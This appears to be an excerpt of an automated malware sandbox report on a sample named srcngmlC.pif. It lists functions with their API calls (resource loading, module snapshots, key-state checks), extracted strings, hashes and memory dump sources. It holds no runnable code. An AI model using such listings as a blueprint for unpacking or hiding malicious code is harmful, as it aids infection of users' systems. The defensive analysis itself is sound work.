Instruction ID: f9393de339a5318b9747a51e2859068e6aac0ebd27bfd67c6f5a95ced324080e
Opcode Fuzzy Hash: ff1c2eab6bc7babd8a6cc7a5fa2d4b08e078f54b114cc54bb75a4dda7081a0c3
Instruction Fuzzy Hash: D2A106677106000BE718AABCEC8437DB3C6DBC4365F28C67EE519CB395EB68C945A790

Uniqueness

Uniqueness Score: -1.00%

Function 029DA5EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,029DA6DA), ref: 029DA672
GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,029DA6DA), ref: 029DA678

Strings

yyyy, xrefs: 029DA64D

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: DateFormatLocaleThread
String ID: yyyy
API String ID: 3303714858-3145165042
Opcode ID: c22b0417c7eedf16bfce0c4e3d3e5ae2d81aae416a60bd64245ec5bbf50c8a07
Instruction ID: c2f1ebbe39071490387e89412dbbf47be4e7bbd7aa25fb565cc6171de1b5e379
Opcode Fuzzy Hash: c22b0417c7eedf16bfce0c4e3d3e5ae2d81aae416a60bd64245ec5bbf50c8a07
Instruction Fuzzy Hash: 6C217F79A04258DFDB10DFA8C881AEEB7F9EF48700F8184A5E945E7350D7349E50EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02A0A904 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

IntersectRect.USER32(?,?,?), ref: 02A0A964
EqualRect.USER32(?,?), ref: 02A0A974

Strings

@, xrefs: 02A0A945

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Rect$EqualIntersect
String ID: @
API String ID: 3291753422-2766056989
Opcode ID: cbc18d0ac1d896cb12466ba29234260cad3ac865e903ab36d0426d2633c7346d
Instruction ID: d907ce112fbc721940879432bf1453700df0753d9ba3e81a43c0bfeb695cbafe
Opcode Fuzzy Hash: cbc18d0ac1d896cb12466ba29234260cad3ac865e903ab36d0426d2633c7346d
Instruction Fuzzy Hash: D7118C31A042585BCB11DBACD8C4BDEBBE89F89354F044291ED44DB382DB75D9058BE0

Uniqueness

Uniqueness Score: -1.00%

Function 029FAF38 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 029FAF86
GetSystemMetrics.USER32(00000001), ref: 029FAF98

Part of subcall function 029FACA4: GetProcAddress.KERNEL32(75BD0000,00000000), ref: 029FAD23

Strings

MonitorFromPoint, xrefs: 029FAF4A

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: MetricsSystem$AddressProc
String ID: MonitorFromPoint
API String ID: 1792783759-1072306578
Opcode ID: 6d41847571ec786065d05bb56d6b3e66a100170661d22c5c25a0c009143cbe49
Instruction ID: 02ca97aed6c3328d445c3a9f5723bea65f481f2fac25ff174e7aef2db68e5d22
Opcode Fuzzy Hash: 6d41847571ec786065d05bb56d6b3e66a100170661d22c5c25a0c009143cbe49
Instruction Fuzzy Hash: CC018673A94204AFDB80CE54D848B9A7B66EB84365F414435FB1CEF281D7B1EC568BA0

Uniqueness

Uniqueness Score: -1.00%

Function 029FAE10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 029FAE61
GetSystemMetrics.USER32(00000001), ref: 029FAE6D

Part of subcall function 029FACA4: GetProcAddress.KERNEL32(75BD0000,00000000), ref: 029FAD23

Strings

MonitorFromRect, xrefs: 029FAE25

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: MetricsSystem$AddressProc
String ID: MonitorFromRect
API String ID: 1792783759-4033241945
Opcode ID: 577223c6fda2c72f5eb7a26432a35d88e28041ec1e173282dcc5d89f996960fc
Instruction ID: c92d4a39c9224c75de280e63b47aedd7baee62d4568b7dd190294bbd1506f3e0
Opcode Fuzzy Hash: 577223c6fda2c72f5eb7a26432a35d88e28041ec1e173282dcc5d89f996960fc
Instruction Fuzzy Hash: 7B01AD32A802049BD7E0CE14D98CB16BB69EB80360F048941EAA9EB242D774EC41CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 029FAD88 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(?), ref: 029FADEA

Part of subcall function 029FACA4: GetProcAddress.KERNEL32(75BD0000,00000000), ref: 029FAD23

GetSystemMetrics.USER32(?), ref: 029FADB0

Strings

GetSystemMetrics, xrefs: 029FAD98

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: MetricsSystem$AddressProc
String ID: GetSystemMetrics
API String ID: 1792783759-96882338
Opcode ID: 8730236609e13fa4c533348385c7092d7d7156edc31c0698792731093367b5c8
Instruction ID: e865129d4da901808d4ab0a6816f7e0b1070b4c64fde6d597c56e4949f934a95
Opcode Fuzzy Hash: 8730236609e13fa4c533348385c7092d7d7156edc31c0698792731093367b5c8
Instruction Fuzzy Hash: B6F09A729942015FCBD08A38D9C8326356AEF85336F818E21E31E8A1D6DF3D8852C720

Uniqueness

Uniqueness Score: -1.00%

Function 02A031E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000010), ref: 02A03203
GetKeyState.USER32(00000011), ref: 02A03214

Strings

, xrefs: 02A03223

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: State
String ID:
API String ID: 1649606143-3916222277
Opcode ID: e8b94229468f08648c098670f5d6776d8ac0e1124f50fdf48a83691f03f9fb1a
Instruction ID: 41dc433954b2d37bee365e7aa39b44893a3a7267a257fdc8d816d5b911f1324c
Opcode Fuzzy Hash: e8b94229468f08648c098670f5d6776d8ac0e1124f50fdf48a83691f03f9fb1a
Instruction Fuzzy Hash: 26E0D1167407C132FE1275547E803D7D7D24F767B8F0885E6FFD4191C1DA850511A1A1

Uniqueness

Uniqueness Score: -1.00%

Function 02A28C28 Relevance: 5.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000004,?,00000004,?,00000008), ref: 02A28C5C
IsBadWritePtr.KERNEL32(?,00000004,?,00000004,?,00000004,?,00000008), ref: 02A28C8C
IsBadReadPtr.KERNEL32(?,00000008), ref: 02A28CAB
IsBadReadPtr.KERNEL32(?,00000004,?,00000008), ref: 02A28CB7

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Read$Write
String ID:
API String ID: 3448952669-0
Opcode ID: f0b00c3df094b11b5a48fba442859b1c5b70d8bc394c6ba809d978a3f1d86900
Instruction ID: 7b8db43fc89b775ec3f33279bd4af7537f5ad10d2e7909948c8dd9643b45f0f4
Opcode Fuzzy Hash: f0b00c3df094b11b5a48fba442859b1c5b70d8bc394c6ba809d978a3f1d86900
Instruction Fuzzy Hash: D621ACB16426299FDF10CF69DD80BAE73A9EF80321F008551FE10A7384DB3CE8158AA0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: srcngmlC.pifPID: 5660, Parent PID: 7048COMMON

Execution Graph

Execution Coverage:	9.9%
Dynamic/Decrypted Code Coverage:	38.4%
Signature Coverage:	10.3%
Total number of Nodes:	437
Total number of Limit Nodes:	47

Executed Functions

Function 004019F0 Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747
comprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 004019FD
_getenv.LIBCMT ref: 00401ABA
GetCurrentProcessId.KERNEL32 ref: 00401ACD
CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
Module32First.KERNEL32 ref: 00401C48
CloseHandle.KERNEL32(00000000,?,?,00000000,?), ref: 00401C9D
Module32Next.KERNEL32(00000000,?), ref: 00401D02
Module32Next.KERNEL32(00000000,?), ref: 00401DB6
FindCloseChangeNotification.KERNEL32(00000000), ref: 00401DC4
GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00401E90
LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
LockResource.KERNEL32(00000000), ref: 00401EA7
SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
_malloc.LIBCMT ref: 00401EBA
_memset.LIBCMT ref: 00401EDD
SizeofResource.KERNEL32(00000000,?), ref: 00401F02

Strings

E, xrefs: 00401E0F
0, xrefs: 00401BBD
_._, xrefs: 00402257
", xrefs: 00401B0F
x, xrefs: 00402088
{, xrefs: 00401E3C
o, xrefs: 00401B8D
x, xrefs: 00401B78
., xrefs: 00401B0A
[, xrefs: 00402047
', xrefs: 00401AF6
___, xrefs: 0040227D
4, xrefs: 00401B64
!, xrefs: 004020CF
W, xrefs: 00401B14
:, xrefs: 00401B28
!, xrefs: 00401B1E
{, xrefs: 0040205B
5, xrefs: 00402109
{, xrefs: 0040211D
4, xrefs: 00402136
v, xrefs: 00401E4B
W, xrefs: 004020E6
v, xrefs: 00401B5A
x, xrefs: 00401E69
o, xrefs: 00402159
., xrefs: 0040201F
V, xrefs: 00402038
{, xrefs: 00401B4B
U, xrefs: 004020F5
8, xrefs: 00401BA9
*, xrefs: 004020E1
), xrefs: 0040202E
x, xrefs: 0040214A
*, xrefs: 00401A1F
v, xrefs: 0040212C
4, xrefs: 00402074
[, xrefs: 00401B37
', xrefs: 00402006
V, xrefs: 00401E19
!, xrefs: 0040201A
W, xrefs: 00401B23
o, xrefs: 00402097
h, xrefs: 00401A6F
D, xrefs: 00401DFB
%, xrefs: 004020FA
W, xrefs: 00402033
6, xrefs: 004020C5
v, xrefs: 0040206A

Memory Dump Source

Source File: 00000005.00000002.1851440244.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1851440244.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_srcngmlC.jbxd

Yara matches

Similarity

API ID: Resource$Module32$CloseFindHandleNextSizeof$ChangeCreateCurrentFirstInitializeLoadLockModuleNotificationProcessSnapshotToolhelp32_getenv_malloc_memset
String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
API String ID: 2366190142-2962942730
Opcode ID: 9b8e818dc389e7faa11c559f92d128544e607fef32914ff1a283466d1b654c82
Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
Opcode Fuzzy Hash: 9b8e818dc389e7faa11c559f92d128544e607fef32914ff1a283466d1b654c82
Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B

Uniqueness

Uniqueness Score: -1.00%

Function 3556CAA0 Relevance: 9.3, Strings: 7, Instructions: 547
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 3556D1AB
@?T5, xrefs: 3556D270
$^q, xrefs: 3556D1CF
$^q, xrefs: 3556D1C3
$^q, xrefs: 3556D182
$^q, xrefs: 3556D176
$^q, xrefs: 3556D19F

Memory Dump Source

Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd

Similarity

API ID:
String ID: @?T5$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-3329914070
Opcode ID: 8ac61fdce70875965b3bed8643b08dc275f9f5595c9e6598771483dab7fba399
Instruction ID: 8d8b2ab9681e453056fc2a91adc177f6e32ad8e987651b54bc705107516aa75d
Opcode Fuzzy Hash: 8ac61fdce70875965b3bed8643b08dc275f9f5595c9e6598771483dab7fba399
Instruction Fuzzy Hash: DD324131E1075A8BCB14DF74C89499DF7B2BFC9304F5196AAD409BB214EF70A986CB81

Uniqueness

Uniqueness Score: -1.00%

Function 3556BC88 Relevance: 4.8, Strings: 3, Instructions: 1084COMMON

Download Yara Rule

Strings

@?T5, xrefs: 3556C4DA
XtT5, xrefs: 3556C590
@?T5, xrefs: 3556C241

Memory Dump Source

Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd

Similarity

API ID:
String ID: @?T5$@?T5$XtT5
API String ID: 0-1892399281
Opcode ID: 1c1775721860f72d9e77376cb4a8fc0a593e159681ac7cf688da6d8923d27a7e
Instruction ID: ac1da4a2626476a8d4682a18a4e3b16fc07b2ad939ad6a0a9361e8066cbf3ee2
Opcode Fuzzy Hash: 1c1775721860f72d9e77376cb4a8fc0a593e159681ac7cf688da6d8923d27a7e
Instruction Fuzzy Hash: B7926C78A10244CFD724DB64C188A5DB7B2FF49359F5095AAE40AEB351DB35EC82CF80

Uniqueness

Uniqueness Score: -1.00%

Function 361B4851 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 329COMMON

Download Yara Rule

Strings

<0T5, xrefs: 361B4C60

Memory Dump Source

Source File: 00000005.00000002.1881434210.00000000361B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 361B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_361b0000_srcngmlC.jbxd

Similarity

API ID:
String ID: <0T5
API String ID: 0-934683110
Opcode ID: 26f8199dd831af08af4d9124b41e988a4cb0c5aa552c80094e423f827365cc87
Instruction ID: 5c8edd8c551f527dce96571737a4b63332b2df22901067cd72136fbafbf8bfa5
Opcode Fuzzy Hash: 26f8199dd831af08af4d9124b41e988a4cb0c5aa552c80094e423f827365cc87
Instruction Fuzzy Hash: 77D14B74A002198FEB04CFA5C984B9DBBF2BF88304F15C558E509AB2A9DB70E945DB91

Uniqueness

Uniqueness Score: -1.00%

Function 35565A90 Relevance: 3.0, Strings: 2, Instructions: 468COMMON

Download Yara Rule

Strings

@?T5, xrefs: 35565B21
XtT5, xrefs: 35565B8C

Memory Dump Source

Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd

Similarity

API ID:
String ID: @?T5$XtT5
API String ID: 0-104808372
Opcode ID: f29dc1ce815c13fcbaf36c60af07b49600bac4080c494ae6ba236abbd362b37b
Instruction ID: 64e2de3ab5ca59663c3cee225853ad1b3bdaa45c507d2d2a88fb71033cf37020
Opcode Fuzzy Hash: f29dc1ce815c13fcbaf36c60af07b49600bac4080c494ae6ba236abbd362b37b
Instruction Fuzzy Hash: 3E02D578B002458FDB05DF68D994A9EBBB2FF89314F548466E406EB391DB30EC42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 3556F45B Relevance: 2.9, Strings: 2, Instructions: 422COMMON

Download Yara Rule

Strings

XPcq, xrefs: 3556F722
\Ocq, xrefs: 3556F5A5

Memory Dump Source

Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd

Similarity

API ID:
String ID: XPcq$\Ocq
API String ID: 0-2802517751
Opcode ID: 74c19c07b15398c356ba5d3a625e5b2516fbbe2c6d521be41529da1c73b36cd0
Instruction ID: dd88209de8cefa7ce874eb7c09f9efc588c889fa5277424f685319827a00943e
Opcode Fuzzy Hash: 74c19c07b15398c356ba5d3a625e5b2516fbbe2c6d521be41529da1c73b36cd0
Instruction Fuzzy Hash: 4CE1E235F001548FEB04DB68D480A9EBBE2FF89354F2594AAE40ADB359DB31EC05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 35566288 Relevance: 2.8, Instructions: 2822COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc276e062b7670b618b89d595425d5a2109f29b3b97f01f12d48134d231a5446
Instruction ID: 472f88e1d398139e51cbe3c7adf339c7f1d8d159e923db3d159633f22f131cb9
Opcode Fuzzy Hash: cc276e062b7670b618b89d595425d5a2109f29b3b97f01f12d48134d231a5446
Instruction Fuzzy Hash: 95530631D10B5A8ADB51EF68C880599F7B1FF99300F11D79AE4587B221FB70AAC5CB81

Uniqueness

Uniqueness Score: -1.00%

Function 35569608 Relevance: 2.2, Instructions: 2199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d72daff9dd21f47916922c27d07f62a643c9ae77cf0ba52fa4ed6091af7ab656
Instruction ID: b8976d3dd4490af049a3c66e2ff7aae2ae3a3f081b4191dfd645d2923e000302
Opcode Fuzzy Hash: d72daff9dd21f47916922c27d07f62a643c9ae77cf0ba52fa4ed6091af7ab656
Instruction Fuzzy Hash: 32232D31D10B598EDB11DF68C880A9DF7B1FF99304F10D79AE459A7221EB70AAC5CB81

Uniqueness

Uniqueness Score: -1.00%

Function 355697B9 Relevance: 2.1, Instructions: 2057COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db0b53f04f0d9fcf48119b131638fcefbb1cd6182edce4884139b7584a7b504c
Instruction ID: 0692fbc530c48c9d1dadf155caa04a5492e731f42e9cb63cbaa05eca5805b8cf
Opcode Fuzzy Hash: db0b53f04f0d9fcf48119b131638fcefbb1cd6182edce4884139b7584a7b504c
Instruction Fuzzy Hash: 8B231B31D10B598EDB11EF68C880A9DF7B1FF99304F10D79AE449A7221EB70AAC5CB41

Uniqueness

Uniqueness Score: -1.00%

Function 3556ED70 Relevance: .6, Instructions: 579COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a99130cdaae55b9a018c4d9829cf199324dc1a84d5a85ac0125003ae90cb33aa
Instruction ID: f95af83641abdbd0c2948621a988b65a8b37ae8b0e08edaf58a1987ea7073811
Opcode Fuzzy Hash: a99130cdaae55b9a018c4d9829cf199324dc1a84d5a85ac0125003ae90cb33aa
Instruction Fuzzy Hash: 3612D439F012559BEB14DB64C8C0A5EB7A2FF85358F108469E84AEB385DB35FC46CB81

Uniqueness

Uniqueness Score: -1.00%

Function 355630B8 Relevance: 50.9, Strings: 40, Instructions: 939
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

<dT5, xrefs: 355634EE
<dT5, xrefs: 35563697
<dT5, xrefs: 35563920
<dT5, xrefs: 35563376
<dT5, xrefs: 3556310C
<dT5, xrefs: 35563B0B
<dT5, xrefs: 35563C1C
<dT5, xrefs: 35563852
<dT5, xrefs: 35563499
<dT5, xrefs: 35563173
<dT5, xrefs: 35563BC1
<dT5, xrefs: 35563EFA
<dT5, xrefs: 35563E44
<dT5, xrefs: 35563241
<dT5, xrefs: 35563987
<dT5, xrefs: 3556330F
<dT5, xrefs: 35563DE3
<dT5, xrefs: 355639EE
<dT5, xrefs: 35563C77
<dT5, xrefs: 355635ED
<dT5, xrefs: 35563E9F
<dT5, xrefs: 355638B9
<dT5, xrefs: 35563B66
<dT5, xrefs: 35563A52
<dT5, xrefs: 35563AB0
<dT5, xrefs: 35563741
<dT5, xrefs: 35563D2D
<dT5, xrefs: 35563796
<dT5, xrefs: 355636EC
<dT5, xrefs: 35563F55
<dT5, xrefs: 35563642
<dT5, xrefs: 35563D88
<dT5, xrefs: 35563440
<dT5, xrefs: 355631DA
<dT5, xrefs: 35563CD2
<dT5, xrefs: 35563598
<dT5, xrefs: 355637F0
<dT5, xrefs: 355632A8
<dT5, xrefs: 35563543
<dT5, xrefs: 355633DD

Memory Dump Source

Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd

Similarity

API ID:
String ID: <dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5
API String ID: 0-1278165183
Opcode ID: f15e5b8081f9def668bea812c2559dc0a25390b03230725ec00119ea9faf1adb
Instruction ID: c2956d2e92387737a86590871de43139ec30dce027471fe7dda96c7c08307b1f
Opcode Fuzzy Hash: f15e5b8081f9def668bea812c2559dc0a25390b03230725ec00119ea9faf1adb
Instruction Fuzzy Hash: D8823BB8B422148FD715DB24C5A0A2DB7B7FB89704F50896AD809A7354DF31AD83CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 355630C8 Relevance: 50.9, Strings: 40, Instructions: 934
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

<dT5, xrefs: 355634EE
<dT5, xrefs: 35563697
<dT5, xrefs: 35563920
<dT5, xrefs: 35563376
<dT5, xrefs: 3556310C
<dT5, xrefs: 35563B0B
<dT5, xrefs: 35563C1C
<dT5, xrefs: 35563852
<dT5, xrefs: 35563499
<dT5, xrefs: 35563173
<dT5, xrefs: 35563BC1
<dT5, xrefs: 35563EFA
<dT5, xrefs: 35563E44
<dT5, xrefs: 35563241
<dT5, xrefs: 35563987
<dT5, xrefs: 3556330F
<dT5, xrefs: 35563DE3
<dT5, xrefs: 355639EE
<dT5, xrefs: 35563C77
<dT5, xrefs: 355635ED
<dT5, xrefs: 35563E9F
<dT5, xrefs: 355638B9
<dT5, xrefs: 35563B66
<dT5, xrefs: 35563A52
<dT5, xrefs: 35563AB0
<dT5, xrefs: 35563741
<dT5, xrefs: 35563D2D
<dT5, xrefs: 35563796
<dT5, xrefs: 355636EC
<dT5, xrefs: 35563F55
<dT5, xrefs: 35563642
<dT5, xrefs: 35563D88
<dT5, xrefs: 35563440
<dT5, xrefs: 355631DA
<dT5, xrefs: 35563CD2
<dT5, xrefs: 35563598
<dT5, xrefs: 355637F0
<dT5, xrefs: 355632A8
<dT5, xrefs: 35563543
<dT5, xrefs: 355633DD

Memory Dump Source

Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd

Similarity

API ID:
String ID: <dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5
API String ID: 0-1278165183
Opcode ID: 918682a8e0d93f911588d6c2a58561f2f380ec92f3599165796f0e0867f88f11
Instruction ID: 4cac75c2676b0678a5346985ded008fa490f023fa86cc1e05deb62ac16e81997
Opcode Fuzzy Hash: 918682a8e0d93f911588d6c2a58561f2f380ec92f3599165796f0e0867f88f11
Instruction Fuzzy Hash: CF823BB8B422148FD715DB24C5A0A2DB7B7FB89704F50896AD809A7354DF31AD83CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 355628D8 Relevance: 24.3, Strings: 19, Instructions: 542
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

XET5, xrefs: 35562FCE
|WT5, xrefs: 35562BDA
0[T5, xrefs: 35562B08
pZT5, xrefs: 35562B32
HLT5, xrefs: 35562E54
IT5, xrefs: 35562ED2
0IT5, xrefs: 35562EFC
@cT5, xrefs: 35562926
DDT5, xrefs: 35562E36
`RT5, xrefs: 35562D00
|QT5, xrefs: 35562D2A
0XT5, xrefs: 35562BB0
pHT5, xrefs: 35562F26
|TT5, xrefs: 35562C82
TUT5, xrefs: 35562C58
$FT5, xrefs: 35562FA4
L`T5, xrefs: 355629CE
|KT5, xrefs: 35562E7E
d]T5, xrefs: 35562A76

Memory Dump Source

Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd

Similarity

API ID:
String ID: $FT5$0IT5$0XT5$0[T5$@cT5$DDT5$HLT5$L`T5$TUT5$XET5$`RT5$d]T5$pHT5$pZT5$|KT5$|QT5$|TT5$|WT5$IT5
API String ID: 0-3560743003
Opcode ID: 89067babdf3f80be2fb4ae6c7c9aadfbf692648a323202c8726cd15f88667456
Instruction ID: d2b88e2ad1254ade98f9f3ce42aa0f1352db4224659050c96ae7763a02f2cd65
Opcode Fuzzy Hash: 89067babdf3f80be2fb4ae6c7c9aadfbf692648a323202c8726cd15f88667456
Instruction Fuzzy Hash: 7402F178751240CBD71A1A78E0A823C35E3BBC9297F6814AEF406DB381DE79EC439B55

Uniqueness

